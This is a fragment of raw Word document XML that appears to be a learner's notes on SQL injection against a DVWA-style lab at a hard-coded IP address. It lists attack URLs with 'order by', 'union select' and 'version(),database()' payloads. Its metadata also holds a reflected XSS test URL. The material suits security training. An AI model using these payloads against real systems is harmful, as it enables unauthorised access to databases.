        <w:t>DB: MariaDB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65720F53" w14:textId="7D7AA9C5" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>Placement: "2'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C2CDB3" w14:textId="2403201F" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>-------------------</w:t>
      </w:r>
      <w:r>
        <w:t>-------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761AB3EB" w14:textId="63038E7E" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>select ??? from ??? where ??="INPUT";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797539C6" w14:textId="77777777" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>Table: ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2136676E" w14:textId="77777777" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:lastRenderedPageBreak/>
        <w:t>Columns: ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2A9C3C" w14:textId="77777777" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>DB name: ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B88941" w14:textId="6914EE36" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>-------------------</w:t>
      </w:r>
      <w:r>
        <w:t>-------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342144A8" w14:textId="491D10BC" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>http://20.251.155.53:8080/vulnerabilities/sqli/?id=2' order by 1,2 -- -&amp;Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B53A4FD" w14:textId="77777777" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>Param: id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ED7472" w14:textId="77777777" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0090433C">
        <w:t xml:space="preserve">Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="0090433C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2' order by 1,2 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A992109" w14:textId="77777777" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>No. of Columns: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F955E7D" w14:textId="2CD7D237" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>----------------------</w:t>
      </w:r>
      <w:r>
        <w:t>----------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0056C3F2" w14:textId="77777777" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>Union Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED3CD72" w14:textId="6EA8499D" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>http://20.251.155.53:8080/vulnerabilities/sqli/?id=2' union select 1,2 -- -&amp;Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7D49C1" w14:textId="77777777" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>Param: id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57836BEB" w14:textId="77777777" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0090433C">
        <w:t xml:space="preserve">Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="0090433C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2' union select 1,2 -- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D00B7B" w14:textId="77777777" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>No. of Columns: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33556A37" w14:textId="7822604F" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>_____________</w:t>
      </w:r>
      <w:r>
        <w:t>______________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EB2677" w14:textId="63DDEE48" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>http://20.251.155.53:8080/vulnerabilities/sqli/?id=2' union select version(),database() -- -&amp;Submit=Submit#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292F5F1A" w14:textId="77777777" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>Param: id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196020F2" w14:textId="77777777" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0090433C">
        <w:t xml:space="preserve">Payload: </w:t>
      </w:r>
      <w:r w:rsidRPr="0090433C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2' union select version(),database() -- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4902A138" w14:textId="73F17525" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>No. of Columns: 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EFCCA5" w14:textId="638AEE1E" w:rsidR="0090433C" w:rsidRPr="0090433C" w:rsidRDefault="0090433C" w:rsidP="0090433C">
      <w:r w:rsidRPr="0090433C">
        <w:t>-------------------</w:t>
      </w:r>
      <w:r>
        <w:t>-------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5954502A" w14:textId="77777777" w:rsidR="003F2732" w:rsidRPr="004F74D8" w:rsidRDefault="003F2732" w:rsidP="00B4531B"/>
    <w:p w14:paraId="78328EDB" w14:textId="77777777" w:rsidR="004F74D8" w:rsidRPr="004F74D8" w:rsidRDefault="004F74D8" w:rsidP="00D55301"/>
    <w:p w14:paraId="59A96A86" w14:textId="77777777" w:rsidR="00D55301" w:rsidRDefault="00D55301"/>
    <w:sectPr w:rsidR="00D553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814DF"/>
    <w:rsid w:val="00094909"/>
    <w:rsid w:val="000C41D8"/>
    <w:rsid w:val="000D116E"/>
    <w:rsid w:val="00275D19"/>
    <w:rsid w:val="002C40CB"/>
    <w:rsid w:val="00360BE5"/>
    <w:rsid w:val="00381DAA"/>
    <w:rsid w:val="003A19A9"/>
    <w:rsid w:val="003D06B3"/>
    <w:rsid w:val="003F2732"/>
    <w:rsid w:val="0044208E"/>
    <w:rsid w:val="004F74D8"/>
    <w:rsid w:val="005E4ED1"/>
    <w:rsid w:val="006051D4"/>
    <w:rsid w:val="006065D7"/>
    <w:rsid w:val="00621F74"/>
    <w:rsid w:val="0067275E"/>
    <w:rsid w:val="006F36C0"/>
    <w:rsid w:val="007A3A76"/>
    <w:rsid w:val="00802E7C"/>
    <w:rsid w:val="00853F7C"/>
    <w:rsid w:val="00857154"/>
    <w:rsid w:val="008A14C6"/>
    <w:rsid w:val="0090433C"/>
    <w:rsid w:val="009440C9"/>
    <w:rsid w:val="00980C67"/>
    <w:rsid w:val="00A34168"/>
    <w:rsid w:val="00A51E32"/>
    <w:rsid w:val="00AB6A3F"/>
    <w:rsid w:val="00B030E4"/>
    <w:rsid w:val="00B36685"/>
    <w:rsid w:val="00B4531B"/>
    <w:rsid w:val="00B521CA"/>
    <w:rsid w:val="00C27C0D"/>
    <w:rsid w:val="00D50929"/>
    <w:rsid w:val="00D55301"/>
    <w:rsid w:val="00DE405B"/>
    <w:rsid w:val="00E32600"/>
    <w:rsid w:val="00F22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192.168.1.111/1.html?name=%3cscript%3ealert(1)%3c/script" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gochanakya.com/chanakya-details/Munna-MBBS-1509" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.46.234/cgi-bin/dheera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30</Pages>
  <Words>4305</Words>
  <Characters>24542</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19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-10T12:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-18T06:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>